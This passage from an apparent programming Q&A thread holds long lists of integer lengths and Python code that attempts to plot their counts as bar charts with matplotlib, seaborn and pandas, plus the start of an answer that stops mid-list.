3668, 355, 396, 415, 361, 229, 269, 1094, 435, 327, 587, 299, 362, 375, 414, 440, 637, 732, 845, 432, 360, 572, 198, 934, 1480, 948, 976, 899, 372, 459, 997, 165, 734, 455, 479, 480, 514, 504, 446, 504, 1620, 552, 1118, 485, 509, 892, 1025, 546, 777, 455, 445, 985, 474, 864, 302, 712, 283, 307, 432, 1075, 478, 732, 685, 375, 507, 1209, 1097, 2480, 477, 343, 432, 496, 465, 457, 768, 561, 660, 915, 661, 255, 217, 960, 265, 526, 672, 798, 357, 1692, 622, 465, 612, 228, 1086, 444, 261, 345, 238, 706, 240, 444, 288, 632, 528, 318, 401, 378, 192, 461, 528, 393, 486, 409, 831, 1019, 745, 222, 216, 
465, 839, 1399, 523, 461, 457, 388, 438, 1062, 351, 553, 814, 345, 494, 643, 307, 306, 252, 569, 534, 557, 372, 374, 344, 696, 351, 582, 903, 375, 432, 303, 743, 617, 459, 492, 495, 999, 284, 538, 291, 748, 742, 739, 449, 212, 261, 579, 1311, 1178, 330, 458, 276, 563, 467, 565, 578, 227, 178, 959, 642, 475, 1242, 325, 365, 360, 314, 523, 201, 569, 571, 351, 319, 298, 468, 1154, 351, 599, 574, 947, 480, 415, 770, 459, 263, 285, 281, 465, 1429, 498, 199, 345, 639, 261, 489, 314, 291, 692, 318, 351, 399, 275, 540, 542, 914, 492, 872, 231, 1324, 373, 270, 302, 479, 285, 381, 270, 410, 1366, 242, 698, 1044, 513, 1004, 951, 702, 796, 291, 282, 444, 734, 1669, 500, 350, 319, 1092, 239, 434, 266, 297, 323, 407, 252, 879, 893, 267, 222, 326, 311, 288, 680, 568, 477, 877, 408, 968, 888, 1497, 1312, 336, 279, 459, 876, 294, 324, 324, 801, 383, 225, 449, 609, 384, 738, 951, 312, 550, 810, 765, 377, 297, 179, 213, 320, 489, 797, 1637, 558, 616, 1907, 517, 556, 773, 669, 426, 432, 956, 336, 757, 353, 420, 462, 797, 475, 1124, 356, 579, 212, 472, 361, 408, 390, 470, 527, 637, 422, 474, 622, 533, 728, 985, 537, 606, 340, 754, 479, 851, 960, 453, 607, 518, 639, 495, 341, 411, 441, 609, 792, 287, 498, 458, 260, 195, 411, 1646, 375, 665, 243, 356, 426, 207, 362, 452, 339, 666, 852, 476, 312, 375, 284, 437, 673, 507, 332, 380, 747, 734, 431, 268, 243, 315, 221, 767, 894, 225, 362, 358, 919, 294, 396, 449, 179, 549, 435, 528, 479, 300, 436, 380, 523, 550, 255, 1043, 645, 402, 203, 479, 679, 478, 654, 769, 471, 418, 617, 342, 674, 993, 321, 615, 150, 204, 1033, 606, 759, 604, 828, 307, 273, 558, 234, 408, 548, 1238, 914, 978, 930, 269, 287, 390, 474, 248, 234, 714, 603, 471, 236, 383, 732, 356, 269, 461, 358, 197, 506, 465, 274, 618, 1309, 1638, 1154, 2222, 930, 1395, 1387, 765, 899, 291, 354, 872, 355, 273, 664, 426, 360, 683, 627, 609, 1230, 861, 6609, 549, 444, 240, 461, 234, 495, 571, 957, 342, 212, 1519, 396, 358, 1272, 1492, 615, 414, 472, 332, 335, 1060, 721, 477, 556, 654, 699, 654, 393, 921, 1651, 504, 710, 1083, 755, 246, 476, 270, 330, 618, 805, 571, 495, 391, 498, 1390, 444, 207, 615, 349, 548, 467, 301, 216, 473, 724, 744, 504, 673, 525, 670, 669, 1221, 288, 884, 462, 565, 434, 522, 455, 639, 1221, 301, 1223, 1029, 991, 491, 465, 434, 472, 392, 821, 719, 543, 246, 818, 913, 402, 535, 492, 492, 491, 534, 968, 886, 316, 541, 494, 409, 246, 435, 442, 989, 473, 790, 624, 398, 469, 273, 735, 328, 601, 627, 356, 344, 410, 1261, 495, 506, 518, 388, 624, 687, 237, 972, 476, 527, 1518, 479, 633, 675, 374, 573, 444, 357, 239, 581, 799, 308, 522, 758, 272, 171, 276, 879, 275, 455, 648, 252, 474, 303, 510, 348, 590, 1086, 504, 928, 530, 495, 1587, 239, 608, 326, 585, 373, 496, 482, 1158, 885, 333, 459, 370, 455, 893, 307, 468, 290, 604, 1198, 306, 1110, 922, 705, 418, 1441, 613, 401, 546, 354, 465, 1205, 328, 703, 570, 428, 232, 1292, 415, 1007, 1285, 1019, 968, 245, 606, 1284, 798, 1588, 1547, 606, 326, 506, 228, 1071, 429, 485, 1508, 625, 294, 330, 405, 343, 192, 452, 359, 222, 1282, 521, 461, 403, 735, 297, 1288, 606, 382, 339, 650, 918, 309, 724, 479, 439, 289, 364, 1683, 226, 1139, 372, 495, 741, 923, 464, 629, 266, 1186, 891, 429, 271, 224, 723, 408, 687, 763, 421, 398, 599, 918, 272, 610, 932, 247, 306, 1224, 594, 531, 349, 332, 405, 486, 406, 752, 441, 386, 368, 663, 350, 480, 1067, 368, 816, 468, 615, 976, 339, 332, 903, 357, 961, 970, 657, 942, 662, 400, 304, 858, 332, 238, 231, 327, 475, 1499, 432, 585, 392, 412, 594, 263, 381, 432, 1320, 269, 439, 465, 321, 718, 1059, 408, 1308, 392, 856, 1255, 
536, 339, 2192, 455, 1390, 715, 522, 980, 432, 320, 2766, 531, 697, 378, 717, 246, 590, 731, 976, 733, 177, 345, 588, 348, 1187, 318, 724, 705, 1146, 284, 610, 354, 298, 331, 693, 1210, 1470, 540, 612, 419, 1039, 574, 739, 1213, 1332, 296, 292, 493, 1046, 567, 662, 708, 233, 1123, 933, 624, 159, 492, 210, 473, 1153, 1489, 974, 669, 1281, 737, 729, 545, 532, 357, 565, 844, 939, 468, 878, 772, 773, 355, 469, 2315, 171, 654, 1063, 432, 1938, 270, 866, 716, 1022, 323, 330, 226, 285, 300, 896, 300, 659, 246, 1493, 231, 906, 294, 465, 533, 525, 363, 524, 891, 788, 270, 240, 723, 734, 2027, 474, 1327, 547, 589, 240, 465, 339, 614, 492, 486, 398, 639, 345, 974, 156, 664, 1544, 1367, 776, 610, 465, 519, 478, 1524, 640, 1431, 1288, 419, 189, 275, 651, 852, 939, 672, 316, 489, 456, 360, 921, 939, 446, 366, 384, 366, 266, 332, 492, 1479, 825, 460, 351, 549, 475, 740, 313, 357, 556, 618, 1039, 411, 234, 378, 567, 269, 990, 270, 573, 629, 996, 1107, 393, 480, 624, 583, 485, 1770, 323, 374, 484, 1128, 609, 379, 1426, 551, 1182, 680, 607, 472, 467, 1312, 468, 342, 473, 1279, 832, 408, 802, 764, 290, 668, 440, 1085, 492, 1523, 189, 329, 1334, 403, 285, 427, 653, 346, 1385, 197, 1281, 465, 468, 414, 981, 473, 879, 552, 246, 522, 610, 609, 255, 915, 2142, 624, 236, 892, 480, 944, 847, 674, 739, 275, 1139, 291, 815, 357, 387, 613, 160, 341, 630, 794, 3061, 552, 167, 447, 300, 471, 1182, 867, 424, 1104, 417, 648, 708, 700, 405, 399, 231, 246, 1588, 766, 1127, 611, 892, 604, 995, 657, 2170, 336, 492, 273, 874, 303, 487, 500, 967, 1380, 345, 300, 1863, 408, 446, 1269, 351, 1448, 570, 336, 487, 270, 270, 804, 833, 1384, 1235, 404, 285, 1499, 708, 834, 584, 309, 492, 528, 762, 624, 380, 323, 916, 403, 384, 409, 530, 241, 724, 1950, 645, 301, 386, 704, 708, 1389, 588, 693, 484, 469, 299, 467, 1119, 696, 610, 824, 231, 531, 321, 663, 177, 635, 573, 268, 711, 892, 513, 707, 872, 619, 576, 476, 506, 285, 594, 495, 564, 399, 387, 638, 536, 594, 772, 955, 672, 312, 305, 627, 774, 575, 1178, 1647, 390, 879, 563, 931, 464, 440, 515, 201, 499, 703, 738, 1372, 794, 712, 503, 1034, 618, 753, 225, 736, 688, 395, 345, 531, 695, 467, 1009, 789, 1659, 532, 913, 261, 359, 611, 660, 480, 555, 551, 849, 743, 1224, 841, 442, 408, 372, 625, 437, 825, 297, 375, 647, 304, 992, 722, 451, 684, 155, 780, 543, 340, 477, 1659, 2790, 480, 445, 457, 968, 360, 306, 676, 498, 603, 318, 724, 600, 265, 718, 381, 343, 776, 600, 600, 600, 600, 600, 600, 600, 597, 600, 597, 584, 255, 1539, 672, 1726, 179, 589, 326, 629, 626, 789, 440, 954, 537, 262, 3015, 405, 374, 381, 743, 272, 479, 640, 293, 359, 412, 959, 550, 1088, 492, 615, 279, 480, 864, 369, 491, 467, 343, 537, 723, 254, 567, 1049, 1313, 591, 311, 477, 1617, 744, 251, 299, 159, 461, 464, 1042, 668, 301, 771, 533, 280, 713, 544, 608, 493, 644, 344, 456, 560, 1110, 307, 290, 1069, 606, 717, 1167, 653, 356, 495, 1012, 432, 297, 1618, 405, 449, 405, 573, 565, 962, 364, 369, 910, 223, 245, 398, 495, 577, 616, 468, 620, 316, 230, 633, 334, 808, 543, 744, 935, 1004, 863, 615, 592, 429, 333, 204, 484, 287, 642, 930, 866, 997, 299, 290, 520, 342, 959, 588, 851, 629, 522, 537, 569, 336, 391, 462, 824, 474, 959, 760, 353, 348, 462, 1420, 1386, 1275, 548, 408, 600, 600, 600, 600, 402, 242, 1391, 1215, 573, 470, 1168, 476, 1712, 376, 868, 495, 379, 300, 1359, 1053, 662, 465, 526, 427, 543, 667, 322, 778, 1327, 435, 360, 507, 1079, 1201, 477, 403, 261, 673, 499, 580, 446, 908, 1490, 552, 269, 576, 616, 933, 961, 384, 236, 479, 255, 495, 483, 602, 354, 435, 650, 826, 455, 704, 246, 636, 1267, 1201, 282, 
567, 432, 2289, 666, 549, 162, 510, 748, 297, 372, 270, 699, 227, 412, 344, 470, 491, 1370, 403, 456, 246, 317, 335, 1379, 952, 456, 416, 519, 312, 656, 338, 863, 688, 340, 854, 666, 697, 742, 967, 587, 192, 462, 490, 337, 890, 1539, 244, 229, 536, 280, 264, 414, 438, 1311, 300, 884, 695, 1509, 798, 612, 611, 414, 533, 678, 426, 274, 466, 883, 864, 603, 873, 1398, 477, 495, 528, 767, 613, 304, 1419, 832, 488, 489, 1290, 648, 266, 1200, 957, 407, 507, 703, 715, 495, 305, 389, 949, 492, 1155, 693, 333, 464, 331, 769, 660, 1115, 403, 483, 899, 279, 371, 354, 361, 444, 552, 286, 248, 265, 662, 393, 2433, 766, 752, 326, 692, 1185, 1170, 678, 728, 432, 656, 1190, 510, 878, 366, 434, 297, 680, 735, 533, 935, 774, 692, 1162, 687, 540, 1417, 464, 339, 779, 471, 566, 281, 384, 271, 760, 698, 357, 513, 888, 475, 515, 216, 864, 303, 630, 425, 299, 562, 522, 1155, 457, 489, 812, 719, 405, 1313, 735, 255, 275, 384, 274, 1007, 289, 457, 1239, 368, 1148, 581, 351, 488, 712, 1097, 639, 478, 481, 630, 479, 493, 740, 1239, 366, 380, 1234, 358, 483, 824, 593, 994, 318, 465, 797, 715, 766, 333, 615, 693, 495, 366, 366, 420, 400, 381, 879, 431, 404, 645, 405, 451, 360, 263, 522, 315, 294, 610, 382, 1304, 417, 655, 824, 829, 463, 798, 453, 495, 264, 1122, 1476, 469, 285, 1098, 838, 430, 293, 418, 225, 260, 1004, 346, 552, 1383, 708, 1218, 348, 738, 358, 342, 303, 993, 597, 1048, 571, 448, 752, 581, 475, 803, 1209, 863, 385, 737, 435, 651, 982, 1286, 1175, 1172, 329, 582, 485, 1280, 338, 520, 308, 407, 330, 392, 420, 1595, 951, 454, 348, 482, 305, 1004, 498, 243, 768, 470, 1773, 770, 266, 543, 456, 622, 516, 773, 661, 368, 395, 364, 444, 506, 606, 1077, 429, 557, 478, 311, 1318, 2398, 724, 402, 435, 345, 511, 1004, 1119, 293, 365, 715, 360, 191, 955, 480, 954, 347, 421, 495, 416, 432, 457, 583, 484, 894, 918, 705, 471, 378, 499, 889, 1277, 624, 307, 1274, 405, 299, 430, 1449, 879, 374, 1078, 1326, 860, 586, 192, 1356, 815, 595, 817, 484, 476, 373, 416, 744, 526, 352, 207, 460, 542, 334, 332, 499, 702, 258, 951, 771, 1199, 372, 425, 459, 448, 542, 343, 270, 791, 969, 287, 316, 398, 460, 357, 270, 811, 741, 474, 374, 582, 869, 404, 409, 421, 581, 797, 1197, 225, 408, 366, 338, 1098, 474, 609, 1318, 568, 864, 813, 1560, 543, 312, 321, 305, 1125, 420, 771, 400, 302, 251, 476, 321, 1140, 405, 764, 390, 275, 317, 697, 447, 573, 348, 1829, 1062, 459, 361, 861, 1385, 1797, 1182, 477, 445, 552, 537, 359, 684, 1079, 342, 260, 519, 408, 827, 823, 456, 529, 1155, 291, 900, 730, 445, 564, 399, 1149, 488, 192, 658, 1520, 1024, 861, 1007, 455, 808, 750, 489, 411, 486, 382, 566, 354, 366, 542, 542, 413, 1056, 1056, 486, 793, 431, 790, 416, 610, 504, 491, 1393, 611, 392, 531, 588, 905, 820, 955, 1148, 782, 1104, 314, 744, 729, 428, 256, 680, 337, 372, 622, 289, 367, 676, 327, 465, 1311, 1101, 370, 401, 729, 302, 587, 378, 420, 1124, 450, 1387, 387, 240, 1232, 352, 589, 669, 1181, 405, 656, 1185, 946, 610, 1696, 610, 294, 537, 381, 646, 393, 325, 274, 300, 449, 669, 342, 551, 1329, 473, 398, 1222, 881, 651, 234, 467, 682, 457, 905, 292, 330, 726, 291, 312, 438, 393, 477, 1494, 188, 369, 491, 394, 539, 674, 569, 531, 342, 770, 347, 279, 510, 360, 346, 959, 661, 315, 406, 813, 527, 517, 568, 373, 417, 429, 330, 572, 638, 210, 266, 894, 746, 344, 459, 772, 261, 339, 876, 575, 317, 1534, 707, 1141, 405, 1104, 282, 954, 441, 573, 656, 255, 444, 610, 1696, 207, 610, 610, 648, 548, 948, 641, 344, 505, 397, 388, 1859, 488, 251, 320, 314, 408, 180, 956, 776, 823, 645, 585, 373, 338, 666, 354, 537, 462, 865, 303, 1098, 602, 501, 714, 766, 
348, 534, 446, 534, 1176, 1158, 412, 989, 360, 2165, 971, 993, 240, 606, 1554, 216, 387, 749, 384, 467, 654, 685, 954, 608, 299, 2270, 1178, 460, 548, 753, 399, 310, 837, 709, 259, 456, 351, 299, 950, 759, 178, 1072, 824, 198, 354, 608, 484, 717, 154, 598, 300, 303, 252, 565, 526, 381, 520, 384, 339, 461, 353, 391, 438, 450, 474, 228, 477, 623, 1196, 269, 341, 559, 468, 492, 528, 254, 1341, 545, 1276, 483, 794, 990, 742, 258, 341, 521, 714, 1234, 437, 1169, 660, 409, 873, 317, 1230, 1029, 1243, 390, 463, 335, 405, 1166, 357, 495, 530, 732, 330, 1368, 330, 330, 1368, 331, 930, 903, 801, 901, 1443, 324, 1444, 1443, 905, 324, 927, 2911, 468, 295, 370, 744, 235, 453, 355, 809, 1494, 168, 480, 494, 1102, 374, 480, 262, 563, 1844, 893, 180, 445, 588, 662, 746, 1482, 1054, 4866, 1377, 560, 726, 292, 377, 315, 1836, 782, 357, 1171, 190, 648, 715, 582, 1386, 540, 336, 482, 607, 361, 542, 357, 276, 1278, 593, 1019, 548, 1390, 552, 465, 372, 1283, 1281, 895, 751, 301, 261, 771, 428, 1206, 441, 1546, 285, 479, 902, 459, 603, 1187, 855, 856, 1444, 903, 930, 334, 856, 334, 856, 334, 1369, 331, 1368, 928, 324, 903, 494, 355, 450, 747, 410, 659, 477, 657, 2609, 477, 991, 930, 944, 464, 645, 476, 347, 849, 327, 445, 729, 486, 198, 369, 232, 396, 480, 269, 426, 351, 249, 803, 475, 228, 266, 844, 393, 516, 779, 483, 374, 561, 368, 374, 203, 494, 1443, 334, 856, 494, 1045, 894, 593, 590, 1086, 504, 928, 265, 312, 465, 408, 493, 265, 1625, 968, 1234, 348, 459, 1098, 318, 621, 549, 785, 1218, 585, 438, 1476, 230, 688, 584, 812, 423, 525, 459, 324, 981, 509, 323, 530, 466, 553, 462, 285, 1275, 402, 756, 1586, 588, 1004, 1170, 555, 426, 288, 605, 699, 1493, 621, 1746, 1023, 502, 375, 1028, 855, 581, 327, 162, 200, 201, 399, 435, 482, 690, 1173, 409, 836, 1526, 1020, 1088, 330, 315, 480, 593, 522, 444, 210, 739, 1900, 778, 847, 711, 219, 300, 303, 1109, 1283, 461, 860, 834, 778, 944, 282, 523, 593, 833, 564, 595, 534, 530, 582, 315, 1236, 1307, 939, 496, 667, 378, 1205, 174, 1331, 443, 479, 648, 857, 1285, 1071, 372, 1116, 577, 646, 645, 759, 1137, 819, 1577, 201, 374, 314, 736, 463, 1179, 491, 588, 953, 528, 392, 1367, 747, 344, 1762, 1048, 1070, 563, 474, 374, 327, 621, 596, 536, 260, 452, 576, 1476, 675, 824, 603, 511, 2064, 405, 548, 388, 1227, 368, 504, 1002, 327, 1544, 728, 906, 880, 405, 477, 585, 1141, 544, 530, 704, 1583, 1006, 422, 657, 1140, 482, 879, 750, 408, 951, 870, 488, 850, 537, 561, 555, 444, 822, 662, 333, 1993, 420, 406, 674, 644, 1392, 1031, 616, 815, 1180, 677, 861, 855, 251, 213, 375, 890, 200, 162, 1195, 1035, 388, 1224, 3684, 1002, 2398, 311, 355, 1626, 674, 626, 663, 646, 528, 1217, 348, 2272, 966, 658, 981, 511, 1121, 760, 312, 566, 961, 1659, 374, 480, 782, 1190, 324, 1140, 1254, 1513, 414, 1015, 1151, 786, 1122, 1642, 316, 476, 393, 1264, 530, 757, 716, 1019, 447, 279, 576, 681, 661, 1827, 267, 852, 738, 992, 1106, 1284, 234, 859, 692, 738, 1263, 473, 1122, 590, 307, 444, 529, 1217, 435, 1910, 1234, 1122, 473, 216, 678] CODE ###library import import matplotlib.pyplot as plt import seaborn as sns import pandas as pd import numpy as np ###first attempt sorted_len = sorted(l) sorted_counted = Counter(sorted_len) range_length = list(range(max(l))) data_series = {} for x in range_length: data_series[x] = 0 for key, value in sorted_counted.items(): data_series[key] = value data_series = pd.Series(data_series) x_values = data_series.index ###second attemmpt df = pd.DataFrame(l, columns=['len']) ###actual plots #x-axis is correct, but y-axis don't display colors... 
plt.bar(x_values, data_series.values) plt.show() #x-axis is correct, but y-axis don't display colors... val, cnt = np.unique(l, return_counts=True) sns.catplot(data=df, kind='count', x='len') #correct number of instances, but wrong x-axis... df.len.value_counts()[df.len.unique()].plot(kind='bar') R output P.S. to be noted I'm using PyCharm with the Invert image outputs for dark themes options so that the cell output for images is displayed on a white background for visibility | Here is the code with changes: import matplotlib.pyplot as plt import seaborn as sns import pandas as pd l = [408, 321, 522, 942, 462, 564, 765, 747, 465, 957, 993, 1056, 690, 1554, 1209, 246, 462, 3705, 1554, 507, 681, 1173, 408, 330, 1317, 240, 576, 2301, 1911, 1677, 1014, 756, 918, 864, 528, 882, 1131, 1440, 1167, 1146, 1002, 906, 1056, 1881, 396, 1278, 501, 1110, 303, 1176, 699, 747, 1971, 3318, 1875, 450, 354, 1218, 378, 303, 777, 915, 5481, 576, 1920, 2022, 1662, 519, 936, 423, 1149, 600, 1896, 648, 2238, 1419, 423, 552, 1299, 1071, 963, 471, 408, 729, 1896, 1068, 1254, 1179, 1188, 645, 978, 903, 1191, 1119, 747, 1005, 273, 1191, 519, 930, 1053, 2157, 933, 888, 591, 1287, 457, 294, 291, 669, 270, 556, 444, 483, 438, 452, 659, 372, 480, 464, 477, 256, 350, 357, 524, 477, 218, 192, 216, 587, 473, 525, 657, 241, 719, 383, 459, 855, 417, 283, 408, 678, 681, 1254, 879, 250, 857, 706, 456, 567, 190, 887, 287, 240, 960, 587, 361, 816, 297, 290, 253, 335, 609, 507, 294, 1475, 464, 780, 552, 555, 1605, 1127, 382, 579, 645, 273, 241, 552, 344, 890, 1346, 1067, 764, 431, 796, 569, 1386, 413, 401, 407, 252, 375, 378, 339, 457, 1779, 243, 701, 552, 708, 174, 300, 257, 378, 777, 729, 969, 603, 378, 436, 348, 399, 1662, 1511, 799, 715, 1400, 399, 516, 399, 355, 1291, 1286, 657, 374, 492, 334, 295, 210, 270, 858, 1487, 1020, 1641, 417, 396, 303, 553, 492, 1097, 612, 441, 654, 611, 532, 474, 864, 377, 465, 435, 1003, 608, 486, 748, 351, 245, 545, 627, 303, 457, 419, 449, 843, 312, 398, 704, 315, 330, 1054, 259, 507, 372, 468, 345, 1303, 408, 1031, 471, 653, 925, 397, 231, 684, 449, 336, 344, 619, 917, 417, 516, 359, 550, 222, 789, 608, 659, 853, 360, 657, 372, 305, 353, 650, 564, 547, 969, 505, 230, 953, 769, 307, 516, 408, 342, 267, 570, 572, 348, 1005, 981, 1586, 1302, 369, 1290, 1458, 572, 1122, 363, 879, 651, 466, 1203, 485, 440, 473, 810, 1320, 461, 455, 258, 660, 297, 285, 424, 273, 378, 432, 293, 410, 327, 483, 477, 551, 894, 638, 538, 678, 303, 478, 1046, 995, 360, 252, 480, 490, 475, 394, 1185, 357, 361, 387, 489, 450, 788, 366, 340, 829, 469, 404, 593, 498, 840, 601, 235, 452, 395, 504, 299, 662, 357, 686, 683, 248, 574, 1108, 587, 483, 1481, 1297, 1334, 579, 182, 456, 1335, 513, 967, 918, 607, 564, 727, 913, 743, 312, 480, 659, 939, 705, 1001, 553, 339, 286, 452, 744, 519, 521, 491, 565, 522, 377, 861, 812, 523, 332, 800, 1015, 1000, 513, 990, 1003, 733, 542, 940, 399, 399, 612, 1361, 399, 399, 318, 319, 510, 504, 841, 1529, 506, 1881, 500, 358, 240, 1261, 354, 519, 779, 656, 311, 635, 527, 759, 333, 648, 770, 330, 584, 453, 632, 513, 998, 343, 696, 1286, 391, 374, 893, 375, 426, 658, 455, 518, 466, 417, 614, 285, 480, 845, 344, 534, 572, 1727, 1085, 480, 468, 192, 348, 578, 2433, 390, 1031, 1129, 626, 735, 963, 439, 272, 806, 743, 560, 250, 679, 459, 207, 905, 616, 404, 489, 582, 340, 435, 1632, 417, 221, 279, 462, 357, 288, 248, 981, 1015, 935, 678, 279, 348, 470, 958, 867, 352, 735, 293, 911, 460, 767, 386, 531, 411, 192, 742, 373, 1454, 970, 285, 468, 273, 1527, 612, 983, 552, 998, 553, 812, 983, 403, 1706, 781, 
183, 405, 891, 647, 1022, 946, 476, 270, 471, 888, 435, 354, 563, 526, 877, 1170, 351, 863, 1503, 562, 1174, 345, 385, 275, 374, 171, 474, 408, 1640, 345, 462, 722, 1645, 504, 840, 459, 783, 501, 473, 609, 684, 543, 353, 788, 684, 734, 242, 751, 478, 471, 365, 293, 380, 486, 617, 786, 436, 632, 624, 386, 925, 469, 405, 2406, 462, 435, 251, 1118, 349, 779, 343, 458, 264, 243, 935, 535, 576, 480, 406, 606, 495, 396, 456, 798, 404, 285, 375, 922, 1136, 330, 339, 559, 998, 239, 587, 468, 1237, 1722, 699, 436, 377, 306, 326, 1076, 385, 537, 315, 342, 386, 400, 340, 202, 266, 455, 435, 259, 317, 456, 249, 452, 1345, 699, 456, 456, 453, 275, 315, 693, 354, 475, 780, 415, 956, 554, 258, 418, 996, 552, 511, 1404, 469, 262, 398, 242, 350, 538, 379, 300, 460, 373, 276, 258, 740, 609, 753, 357, 495, 532, 551, 234, 633, 480, 312, 898, 350, 705, 265, 345, 334, 334, 582, 583, 582, 478, 465, 480, 408, 870, 624, 1107, 303, 384, 1165, 1456, 878, 297, 301, 276, 372, 551, 799, 496, 204, 552, 791, 330, 359, 480, 468, 414, 1102, 876, 1112, 850, 536, 500, 374, 825, 476, 499, 275, 345, 616, 360, 609, 310, 260, 376, 283, 390, 1529, 1310, 207, 1039, 661, 570, 1292, 914, 843, 658, 302, 1119, 609, 225, 317, 1091, 225, 403, 544, 495, 912, 744, 473, 985, 342, 630, 298, 392, 297, 933, 888, 666, 1023, 346, 310, 1134, 840, 1277, 387, 463, 435, 610, 492, 1107, 582, 582, 582, 1307, 647, 1280, 555, 645, 267, 952, 588, 348, 287, 507, 410, 737, 731, 354, 2192, 309, 388, 692, 389, 742, 766, 1228, 1640, 237, 495, 351, 285, 2443, 963, 296, 420, 482, 246, 553, 621, 405, 597, 459, 310, 300, 450, 471, 291, 610, 723, 380, 1439, 312, 900, 275, 396, 342, 309, 549, 355, 474, 417, 372, 384, 291, 987, 629, 407, 655, 357, 473, 348, 459, 599, 474, 430, 620, 584, 546, 435, 242, 1167, 627, 378, 945, 349, 255, 216, 530, 516, 606, 449, 1490, 401, 1070, 899, 452, 1304, 451, 723, 354, 229, 629, 639, 501, 465, 344, 1895, 288, 341, 2377, 542, 453, 291, 645, 494, 471, 612, 1294, 713, 1291, 467, 734, 300, 1432, 320, 753, 609, 1051, 231, 875, 704, 438, 742, 504, 1334, 738, 342, 435, 1133, 1229, 436, 310, 494, 273, 1228, 626, 470, 235, 1264, 465, 450, 350, 647, 541, 256, 231, 435, 485, 224, 555, 395, 300, 969, 237, 1717, 416, 538, 371, 326, 360, 1194, 397, 519, 645, 324, 465, 402, 477, 527, 831, 1179, 366, 889, 941, 374, 775, 581, 392, 1188, 797, 480, 418, 733, 857, 332, 255, 2847, 917, 478, 585, 591, 480, 1293, 273, 375, 489, 727, 316, 1451, 975, 762, 528, 408, 1104, 375, 265, 609, 317, 879, 542, 332, 462, 492, 284, 282, 394, 483, 493, 778, 291, 443, 350, 491, 374, 369, 862, 245, 269, 640, 282, 606, 393, 307, 488, 276, 611, 471, 1806, 1296, 336, 244, 1105, 444, 375, 1214, 294, 455, 353, 605, 669, 354, 692, 345, 643, 289, 460, 771, 351, 1635, 331, 465, 703, 352, 396, 269, 1142, 353, 552, 2790, 611, 606, 731, 447, 485, 420, 283, 744, 1265, 381, 1146, 589, 477, 309, 669, 389, 435, 558, 445, 1448, 333, 762, 1222, 779, 519, 465, 317, 375, 480, 371, 787, 305, 1276, 408, 304, 246, 791, 341, 330, 536, 278, 383, 417, 351, 323, 1068, 507, 741, 678, 613, 823, 1748, 411, 676, 287, 486, 433, 506, 194, 444, 860, 1212, 1005, 321, 462, 1158, 223, 625, 294, 294, 1598, 205, 764, 2649, 1226, 479, 543, 321, 1143, 648, 2409, 291, 1095, 651, 405, 294, 728, 267, 805, 294, 1010, 405, 368, 442, 363, 3117, 296, 466, 1621, 509, 219, 692, 453, 749, 828, 950, 683, 574, 438, 396, 461, 740, 350, 408, 1636, 746, 821, 912, 482, 532, 397, 582, 537, 761, 348, 354, 356, 978, 348, 441, 464, 1206, 576, 355, 446, 577, 1186, 396, 980, 213, 498, 597, 335, 419, 351, 617, 226, 609, 206, 762, 
596, 999, 589, 585, 477, 558, 206, 806, 405, 356, 742, 881, 426, 434, 735, 494, 611, 308, 453, 426, 664, 384, 335, 612, 286, 463, 363, 460, 327, 1007, 1285, 1021, 464, 662, 1266, 1275, 205, 581, 351, 409, 387, 406, 296, 353, 447, 472, 667, 572, 682, 460, 941, 382, 477, 819, 340, 477, 716, 461, 302, 348, 291, 459, 567, 625, 216, 713, 394, 462, 620, 486, 1049, 1027, 761, 534, 348, 346, 313, 551, 522, 612, 303, 186, 288, 1054, 481, 1263, 530, 603, 491, 297, 1989, 598, 545, 291, 568, 201, 538, 267, 894, 2037, 456, 291, 367, 338, 782, 435, 570, 245, 371, 341, 478, 511, 348, 1019, 1315, 1007, 469, 711, 848, 1810, 807, 455, 607, 435, 270, 489, 408, 574, 444, 438, 495, 474, 675, 1024, 610, 464, 477, 549, 305, 366, 306, 222, 158, 893, 312, 348, 259, 261, 336, 495, 560, 452, 273, 357, 455, 195, 506, 1403, 345, 347, 462, 957, 224, 798, 487, 372, 798, 420, 316, 400, 399, 878, 618, 371, 369, 336, 474, 350, 1081, 1012, 649, 480, 430, 570, 341, 759, 456, 237, 466, 531, 455, 846, 280, 767, 758, 624, 724, 582, 1924, 270, 570, 1800, 530, 826, 1478, 345, 624, 498, 231, 686, 592, 1671, 413, 582, 302, 504, 666, 727, 613, 857, 270, 446, 483, 1781, 1308, 358, 1393, 453, 672, 264, 412, 281, 378, 476, 562, 792, 342, 495, 342, 392, 269, 1495, 668, 490, 272, 266, 270, 1080, 401, 405, 395, 588, 306, 604, 482, 301, 1439, 1605, 1833, 441, 1287, 1093, 1564, 1093, 624, 1925, 1287, 894, 428, 547, 1924, 1455, 938, 1369, 1794, 404, 605, 570, 447, 1171, 268, 626, 318, 406, 1471, 1069, 792, 657, 482, 420, 1121, 844, 522, 1560, 734, 1318, 723, 1335, 830, 825, 287, 440, 895, 323, 782, 479, 1397, 860, 297, 1002, 570, 603, 576, 269, 466, 758, 509, 552, 462, 493, 477, 431, 351, 757, 438, 1765, 1486, 480, 907, 620, 600, 438, 576, 576, 801, 515, 862, 337, 532, 385, 953, 719, 1223, 468, 486, 445, 231, 610, 474, 311, 738, 868, 453, 558, 409, 305, 827, 308, 614, 519, 380, 763, 472, 313, 447, 960, 741, 444, 520, 543, 531, 450, 413, 305, 492, 868, 207, 1285, 492, 802, 435, 303, 723, 705, 308, 417, 353, 347, 737, 380, 477, 343, 345, 409, 408, 276, 193, 270, 845, 792, 443, 1111, 256, 800, 549, 315, 274, 426, 470, 359, 473, 271, 576, 1293, 342, 761, 577, 671, 340, 276, 394, 467, 387, 336, 920, 350, 1400, 195, 336, 1282, 282, 773, 757, 566, 396, 880, 494, 661, 953, 480, 314, 468, 468, 339, 550, 1075, 334, 318, 365, 567, 286, 1560, 207, 1344, 584, 333, 387, 1164, 1074, 1324, 1080, 405, 264, 300, 582, 342, 427, 514, 576, 993, 208, 669, 993, 439, 219, 742, 890, 966, 520, 337, 488, 438, 561, 319, 476, 300, 465, 1056, 1044, 216, 198, 267, 327, 527, 746, 447, 288, 923, 268, 300, 262, 1015, 468, 289, 341, 345, 483, 482, 548, 255, 441, 229, 435, 453, 264, 369, 403, 333, 461, 446, 221, 405, 848, 616, 396, 405, 495, 476, 315, 351, 438, 495, 482, 456, 322, 666, 1031, 633, 306, 880, 2683, 774, 494, 993, 430, 1284, 1118, 1030, 219, 384, 2249, 301, 195, 689, 251, 302, 474, 732, 790, 435, 436, 270, 198, 435, 583, 800, 310, 576, 280, 363, 651, 743, 855, 485, 673, 1014, 345, 407, 351, 3668, 355, 396, 415, 361, 229, 269, 1094, 435, 327, 587, 299, 362, 375, 414, 440, 637, 732, 845, 432, 